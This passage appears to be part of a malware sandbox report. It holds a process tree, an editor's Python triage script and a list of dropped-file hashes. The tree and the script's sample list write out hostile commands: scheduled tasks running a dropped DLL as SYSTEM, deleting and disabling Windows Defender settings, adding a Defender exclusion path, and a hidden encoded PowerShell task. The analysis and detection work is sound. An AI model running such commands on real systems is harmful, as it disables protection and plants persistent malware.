C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "XFllyoUkeQVbq2" /F /xml "C:\ProgramData\sUklQelueKqzsVVB\NASOIDK.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1472 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "asZjWRxPJGYSVOeSc2" /F /xml "C:\Program Files (x86)\PhaWElAePoHhBdUTFeR\tkDoewx.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2704 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "hcGrzUAxWeRcgCYFZrx2" /F /xml "C:\Program Files (x86)\yczsUHdtPuMxC\uGNaqiB.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2488 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "yWyixlOEsLxsTwFTt" /SC once /ST 16:50:00 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\szdKxxrFMiVXCdXj\IekAmSJh\tQaSfTW.dll\",#1 /kmsite_idLlz 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2548 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "yWyixlOEsLxsTwFTt"3⤵PID:2060
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:332
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵PID:2032
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:1180
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵PID:2532
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "NDmpcgCvNfyvVRxht"3⤵PID:2216
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\szdKxxrFMiVXCdXj\IekAmSJh\tQaSfTW.dll",#1 /kmsite_idLlz 5254032⤵PID:2604
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\szdKxxrFMiVXCdXj\IekAmSJh\tQaSfTW.dll",#1 /kmsite_idLlz 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:2496 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "yWyixlOEsLxsTwFTt"4⤵PID:1800
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:964
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2884
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2732
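The tree repeats one pattern: write a Defender setting with reg.exe (under both the live key and the Policies key, once per registry view via /reg:32 and /reg:64), create a scheduled task whose action is an encoded PowerShell one-liner, run it, delete it, and hand off to SYSTEM-level tasks for the dropped binaries. As an added triage example (the editor's code, not part of the sandbox report), the Python below decodes the -EncodedCommand payload (base64 over UTF-16LE), classifies the Defender registry writes, and groups the schtasks operations by task name so the create/run/delete churn and the SYSTEM tasks stand out. The command lines in SAMPLE are copied from the tree; the function names, effect labels and the ATT&CK IDs attached (T1562.001 for the Defender tampering, T1053.005 for the scheduled tasks) are the editor's own mapping.

```python
"""Triage helpers for the sandbox process tree above.
Added example (editor's code, not part of the report): SAMPLE is copied from
the tree; the regexes, effect labels and ATT&CK mapping are the editor's own.
"""
import base64
import re
from collections import defaultdict

# Constructed sample: command lines copied verbatim from the process tree above.
SAMPLE = [
    'schtasks /CREATE /TN "grhLnNDuO" /SC once /ST 07:36:18 /F /RU "Admin" '
    '/TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="',
    'schtasks /run /I /tn "grhLnNDuO"',
    'schtasks /DELETE /F /TN "grhLnNDuO"',
    'REG ADD "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-time Protection" '
    '/f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64',
    '"C:\\Windows\\System32\\reg.exe" ADD "HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths" '
    '/f /v "C:\\Windows\\Temp\\szdKxxrFMiVXCdXj" /t REG_DWORD /d 0 /reg:64',
    'REG DELETE "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Spynet" /v "SpyNetReporting" /f /reg:32',
    'schtasks /CREATE /TN "bQrKcOXclPyMmQgfTY" /SC once /ST 17:29:00 /RU "SYSTEM" '
    '/TR "\\"C:\\Users\\Admin\\AppData\\Local\\Temp\\HwCJYAoGHZGEGAfxF\\xtiGjqqlqnODuBu\\ycRIbyo.exe\\" BX /Nrsite_idNdO 525403 /S" /V1 /F',
]

# powershell.exe accepts -e / -ec / -enc as abbreviations of -EncodedCommand.
ENC_RE = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]+)", re.I)
# reg.exe ADD/DELETE, with or without a full image path and an optional "cmd /C" wrapper.
REG_RE = re.compile(r'^\s*(?:cmd(?:\.exe)?\s+/c\s+)?"?[^"\s]*reg(?:\.exe)?"?\s+(add|delete)\s+"([^"]+)"(.*)$', re.I)
VALUE_RE = re.compile(r'/v\s+"([^"]+)"', re.I)
DATA_RE = re.compile(r"/d\s+(\S+)", re.I)
TASK_RE = re.compile(r'^\s*schtasks(?:\.exe)?\s.*?/(create|run|end|delete)\b.*?/tn\s+"([^"]+)"', re.I)
RUNAS_RE = re.compile(r'/ru\s+"([^"]+)"', re.I)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 over UTF-16LE), or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def defender_finding(cmdline):
    """Classify a reg.exe ADD/DELETE against Windows Defender configuration; None otherwise."""
    m = REG_RE.match(cmdline)
    if not m:
        return None
    op, key, rest = m.group(1).upper(), m.group(2), m.group(3)
    key_l = key.lower()
    if "\\windows defender\\" not in key_l:
        return None
    vm, dm = VALUE_RE.search(rest), DATA_RE.search(rest)
    value = vm.group(1) if vm else None
    data = dm.group(1) if dm else None
    if key_l.endswith("\\exclusions\\paths"):
        effect = "exclusion-path-added" if op == "ADD" else "exclusion-path-removed"
    elif key_l.endswith("\\exclusions\\extensions"):
        effect = "exclusion-ext-added" if op == "ADD" else "exclusion-ext-removed"
    elif value and value.lower() == "disablerealtimemonitoring":
        effect = "realtime-protection-off" if op == "ADD" and data == "1" else "realtime-protection-restored"
    elif value and value.lower() == "spynetreporting":  # 0 = MAPS/SpyNet reporting disabled
        effect = "maps-reporting-off" if op == "ADD" and data == "0" else "maps-reporting-restored"
    else:
        effect = "defender-config-other"
    return {"technique": "T1562.001", "op": op, "key": key, "value": value, "data": data,
            "policy": "\\policies\\" in key_l, "effect": effect}


def task_op(cmdline):
    """Extract operation, task name and run-as principal from a schtasks command line."""
    m = TASK_RE.match(cmdline)
    if not m:
        return None
    ru = RUNAS_RE.search(cmdline)
    return {"technique": "T1053.005", "op": m.group(1).lower(), "task": m.group(2),
            "run_as": ru.group(1) if ru else None}


def triage(cmdlines):
    """Apply every rule and group scheduled-task operations by task name."""
    out = {"decoded": [], "defender": [], "tasks": defaultdict(list)}
    for c in cmdlines:
        dec = decode_encoded_command(c)
        if dec is not None:
            out["decoded"].append(dec)
        f = defender_finding(c)
        if f:
            out["defender"].append(f)
        t = task_op(c)
        if t:
            out["tasks"][t["task"]].append(t)
    return out


def short_lived_tasks(report):
    """Tasks created, run and deleted in one session: schtasks as a launcher, not persistence."""
    return [n for n, ops in report["tasks"].items() if [o["op"] for o in ops] == ["create", "run", "delete"]]


def system_tasks(report):
    """Tasks created to run as SYSTEM: the privilege hop out of the Admin session."""
    return [n for n, ops in report["tasks"].items()
            if any(o["op"] == "create" and (o["run_as"] or "").upper() == "SYSTEM" for o in ops)]


if __name__ == "__main__":
    r = triage(SAMPLE)
    print("decoded:", r["decoded"])
    print("defender:", [(f["effect"], f["policy"]) for f in r["defender"]])
    print("short-lived:", short_lived_tasks(r), "SYSTEM:", system_tasks(r))
```

The payload decodes to `start-process -WindowStyle Hidden gpupdate.exe /force`, which is why each short-lived task is followed in the tree by a powershell.EXE child spawning gpupdate.exe: the writes go under HKLM\SOFTWARE\Policies\Microsoft\Windows Defender, and a forced Group Policy refresh is the usual way to make the Defender service re-read policy-backed values. Because REG_RE also accepts the `cmd /C` wrapper, a cmd.exe parent and its reg.exe child yield the same finding twice; in a real pipeline, dedupe by parent/child PID before counting.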
Network
MITRE ATT&CK Enterprise v15
Downloads
Dropped-file hashes as recorded by the sandbox. Entries whose file path was lost in extraction are marked "path not recorded"; a hash set that the report lists more than once is shown once with the number of times it appears.
-
path not recorded | Filesize 2KB
MD5    84b9fcc539784d364a60d65a6962853b
SHA1   745d14d5d4deaeb2e1c8d49699bc63b853c64f91
SHA256 d745b7f698f6cdb14d3eb861c12ee378f9d0518366b4c1b31ca4f2a572229095
SHA512 5fdd6abe83062578c6210dd2dcd5ac67c4003ab9a62f063aa85a2849803f1b5c085e992b4fe88ccf0bf55e5b8e281e7f6887eb93f14a25f1bd381377221b0b08
-
path not recorded | Filesize 2KB
MD5    db9dc34bef1d19f6d1f43946962cf2e5
SHA1   e376088f78127dda41b958b922d62b82f2a0beef
SHA256 c4c76241f43b5a5766de380f6aea8d9b309381e522dcdde4dbb61b4db09f1651
SHA512 09ff7adac53ea0b92f940f94b9eb5699dbb3859e6b8f91f18e4040be092291301de95a1c070a304791b3e292d1b6f9bee916192703bb9876f590d8e469030223
-
path not recorded | Filesize 2KB
MD5    0b670a22043ee3ff1444cef61a4661fd
SHA1   3f3c2329fe9fee5eba36dead501925639bb7ed71
SHA256 7924bd37502886975c1d863ecd3a59b327cc11db0836f87ebdc00e5d9eb63112
SHA512 fdbc57b6ac1adea62028c77f14e69f7db0c82276f2c1b638e40b2f79c73f9b12438156a3afac41098d9c4527df6f58777dd2ad174ca5c0ec81478b57ff84c97f
-
path not recorded | Filesize 2KB
MD5    7c52fc0fc81e742cf10a6125610ae2f8
SHA1   e3a72ab8f091e99ab8b1241c94ac4eb002e73486
SHA256 f3f463f32b1378453d010d45b4d41c2b1cf915235ee915905f8500c177d526d4
SHA512 0be8c6dcd47517bf0efa3ae72f03fd20fb5d8b767624950b1d6a5073c087f40150fa5c1e78d8ac0a70c145c687893878e8793686d127d9731bede9086699e102
-
path not recorded | Filesize 1.4MB
MD5    ead00bec7fb011ee521235b3d2108e04
SHA1   0fcaf18cb212a31c92dc686cdfb1fad9425a48a0
SHA256 f75bdfdfea37b6bb38a85fdde4bde582815dc403fe7f3554cc2d22cc5e2f3899
SHA512 6bca717e8272bda8ff4af2fde2bde9f12255e1146d0515ad3af4a0cc2c36d9a5a4b65f7b4fccc2b3370184b0b802f77bed74ce65acc1efca0e36bc2bcfbb4eea
-
path not recorded | Filesize 2KB
MD5    41c5de14fd1720b1d96a1182fc94dfeb
SHA1   829ef68fb215998c057dbfd3dafad5a0298734f0
SHA256 113fddd2d19e8381b6df0371bd1207c8fd686571b3b399b648d440ad0848bc24
SHA512 53e9875e9973b1bcc8110939bc4369a742b276906c80c9b6708e18c65f2f8bb5627979989444c3f7c939193a36ce5268198c728de29ea79a5205969ec03dff6f
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json | Filesize 187B
MD5    2a1e12a4811892d95962998e184399d8
SHA1   55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json | Filesize 136B
MD5    238d2612f510ea51d0d3eaa09e7136b1
SHA1   0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json | Filesize 150B
MD5    0b1cf3deab325f8987f2ee31c6afc8ea
SHA1   6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
path not recorded | Filesize 9KB
MD5    74ee0e365515a203aec12ae12229c2bc
SHA1   c0fa25f96bf51858d1d8b5a0a164c25e34ad48c2
SHA256 674cbfe5d2bd82bff4733ae54f4172cd7ed259246fa13ed967571aa73b2da3b3
SHA512 752b33fe16443b3a181935beb35ed43e86c3c006d28d6ca479442f68c127ca9bc6829716e4a8bae6e29dc1cdcf9d3ba82101605c0708e39dfe95cb9ce47cc76d
-
path not recorded | Filesize 6.1MB | listed 6 times in the report
MD5    f4cae6ac1b8134725afadd5775c208e8
SHA1   809e509c3392b0d59f00ba72a4453c7415ef8ce1
SHA256 ce968022435b48ee3c8a214d0a2c81746f0ff58ac537a3648ab91b13fdce440a
SHA512 47cbff1167ce6b661fff4b115009e6c9d67e1cdf2020c59a46528ee654a0072135a790add48100056cff9ada2636e82c1b5b7172c6d7512dc182b28c1bcf1563
-
path not recorded | Filesize 6.9MB | listed 11 times in the report
MD5    6b7269665d6d4db4cb0b5982cc6decc3
SHA1   5bbac281f40602c98b2a12082b6de481b7c135b2
SHA256 77f93eef46fc105b58eb9c463277a1381a28bf747e10686f6e296b8c96003ba8
SHA512 a19e723cbe9a654d79e1f4a95a5c6c7e474746cd816438db0b98e04f20a14d2905be60938329f7c06dfe2d531f496039bfccf118a93e4ece2467f4ae49856cd0
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms | Filesize 7KB
MD5    1ccfc2e5e1a5e69275d4f1a7dcf01a18
SHA1   708899e66f97eca76286139fdc23acc01eabdbf5
SHA256 c24bc7c406a8274c99237cd8d1130620fbb68578ad3d10d03572334680996445
SHA512 def37f69835c30d3b3331943715dce1e1ada74ad2f83733a63813388871ba9d9403998d70e3552c6cca767ae361c748f31247c0f04f857a9b5a577db5246510f
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms | Filesize 7KB
MD5    5cb215913b8673d9f1e4f2a71d31282c
SHA1   01c5a0630e770f6fd88981c47c42225e3df6eaa8
SHA256 0283d042a91d28434e17ab406250608e55adf6961b0f78810a40ad5818b83d2d
SHA512 2007dcc51e7286e3143238060119b276f1ae20b1f9a2487c31ae06d7ee094e017a5fb16f55706910db6008cc41696a7543ca5d24051447895e31c8d9f803977b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms | Filesize 7KB
MD5    3a0ee3e2f72c3983ff755922549383fc
SHA1   aba0b37ad71726e9919e34be994dd08d02a653c7
SHA256 ce0047ced406f58651a6c1ee0086d3a46774b60174a22cf243848f5b63222d46
SHA512 75b514bd1035d4d36bb00020d1736d31b643f3a85195e1af67105017af02a0f30f87d2e55956496fff6cc4e30aecbf3b61a5045ad321d57c4acf9d9293427d99
-
path not recorded | Filesize 7KB
MD5    19d39a215da1713dd5a3ddabad758ce4
SHA1   c9540e202d1606e7263bd2ac73ebc02d9a80c7f1
SHA256 093a75ed13a23a6618ae3ca0494590f6385cccf89f3c2ac79f52be027e878626
SHA512 1c6380d6748cd622a136a22198e9cf22f06810cf315eab1a7b8e791bc458668109db9ef704b1d9bdb0d7197cad660cfe16f3c7217842f2729957064be87c36b0
-
path not recorded | Filesize 6.1MB | listed 5 times in the report
MD5    40f6a2cc59a1b8b2bd8e9f2d3e51e833
SHA1   84ada4ab4def6dd57e96c9fa70c6699bffc93eb3
SHA256 c07e08ba7bf08c5f09990f2f64790c41f7b391312a51b1df56ace43d2833a6b1
SHA512 3da9e9f0dd514ee71cc327ec0f0bff598b06ab150c9a84c589e20f3787a9628561f4d20467f45686f62e0a4ec7cc29d7127c61be6e0d122312750e3aca5232f7
-
path not recorded | Filesize 9KB
MD5    255b9a5ccfc5384c5b366952ec77b15e
SHA1   55e87a5aae1840eddb53739119e864ce9718f821
SHA256 b3bc090dc4e06626777eaf7dc03d39d5d7b6223c2cbf29368b2637131859d3ae
SHA512 a561a99850c5043da4ac080206801197f69da0b44ba6b0c11228b4ef95c417a0128cbd4003333bdc6c05c8193faf330732f121d28078bb5792f4d0af4ac6fb56
-
path not recorded | Filesize 6KB
MD5    9da7fecea8b2d9222aa197a0c745eb3d
SHA1   1c405d61f571481996bea9b293dad34b1ea059cc
SHA256 de8cfd475d49a17b8f50490f644a94bfe1ea87a9b23f4d36a5281670bb4de69b
SHA512 7db37fab3373918874be16f292a8a9a3e85809dc019614b6e298a7fa1748c13471b1a053f7cb893215c66f7a95345fce49f8e9dd8270bbf293fcdf333cbfbd0f
-
path not recorded | Filesize 268B
MD5    a62ce44a33f1c05fc2d340ea0ca118a4
SHA1   1f03eb4716015528f3de7f7674532c1345b2717d
SHA256 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA512 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
-
path not recorded | Filesize not recorded (these are the digests of a zero-byte file, consistent with the "copy nul" step in the process tree that creates the empty .wsf)
MD5    d41d8cd98f00b204e9800998ecf8427e
SHA1   da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e